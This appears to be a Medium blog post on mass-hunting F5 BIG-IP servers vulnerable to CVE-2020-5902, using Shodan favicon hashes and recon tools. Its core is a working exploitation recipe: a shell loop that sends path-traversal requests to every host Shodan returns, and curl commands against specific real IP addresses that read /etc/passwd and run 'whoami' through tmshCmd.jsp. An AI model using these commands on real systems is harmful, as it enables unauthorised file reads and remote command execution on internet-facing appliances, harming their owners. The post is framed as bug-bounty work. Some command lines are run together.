CVE-2020–5902 Mass Hunting with shodan and Favfreak

Prerequisites :

Tool Need to be installed :

  1. FavFreak
  2. Shodan CLI
  3. Assetfinder
  4. httprobe
git clone https://github.com/devanshbatham/FavFreakcd FavFreakpip3 install -r requirements.txt
  1. easy_install shodan
  2. shodan init YOUR_API_KEY
go get -u github.com/tomnomnom/httprobe
assetfinder -subs-only target.com | httprobe | python3 /root/Tools/FavFreak/favfreak.py -o output —-shodan
shodan search http.favicon.hash:<input hash> --fields ip_str,port --separator " " | awk '{print $1":"$2}' | while read host do ;do curl --silent --path-as-is --insecure "https://$host/tmui/login.jsp/..;/tmui..." | grep -q root && \printf "$host \033[0;31mVulnerable\n" || printf "$host \033[0;32mNot Vulnerable\n";done
curl -sk 'https://52.20.40.40/tmui/login.jsp/..;/tmui/locallb/workspace/fileRead.jsp?fileName=/etc/passwd'curl -sk 'https://35.226.53.127/tmui/login.jsp/..;/tmui/locallb/workspace/tmshCmd.jsp?command=whoami'

NOTE: There are chances of getting false positives!! && Higher Chance of getting DUPLICATE REPORT!!!!!

Happy Hunting !!

  1. Download go from official website https://golang.org/dl/go1.14.4.linux-amd64.tar.gz
  2. cd /root/Download [ Assuming this is your download location ]
  3. tar -C /usr/local/ -xvf go1.14.4.linux-amd64.tar.gz
  4. vim ~/.bashrc
  5. export GOPATH=/root/go-workspace
    export GOROOT=/usr/local/go
    PATH=$PATH:$GOROOT/bin/:$GOPATH/bin
  6. source ~/.bashrc

--

--

--

Lazy af :) OSCP — eWPTXv2

Love podcasts or audiobooks? Learn on the go with our new app.

Recommended from Medium

Square implementation with Laravel

Pride, Prejudice, Production and Cloud Native Applications

How to setup a Keycloak server with external MySQL database on AWS ECS Fargate in clustered mode

Adding an RPG Style Shop (Part 1)

Building a Race Car Frame out of a Toy

Taints, Tolerations and Node affinity in Kubernetes

9 Things To Make Mobile App Successful

Looking ahead to 2021 at CountryRisk.io

Get the Medium app

A button that says 'Download on the App Store', and if clicked it will lead you to the iOS App store
A button that says 'Get it on, Google Play', and if clicked it will lead you to the Google Play store
Anon Tuttu Venus

Anon Tuttu Venus

Lazy af :) OSCP — eWPTXv2

HTB Chase [easy] Forensics Challenge

[ Hack The Box ] Secret

A Comprehensive and Practical Guide to Stack-Based Buffer Overflows.

RootMe Walkthrough — THM